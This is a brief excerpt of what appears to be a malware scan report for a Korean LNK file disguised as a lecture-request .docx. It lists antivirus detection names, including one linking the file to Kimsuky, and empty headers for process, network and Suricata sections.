AhnLab-V3	Downloader/LNK.Generic
VBA32	Trojan.Link.Crafted
SentinelOne	Static AI - Suspicious LNK
Fortinet	LNK/Kimsuky.GOSU!tr
AVG	LNK:Agent-EW [Trj]

멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All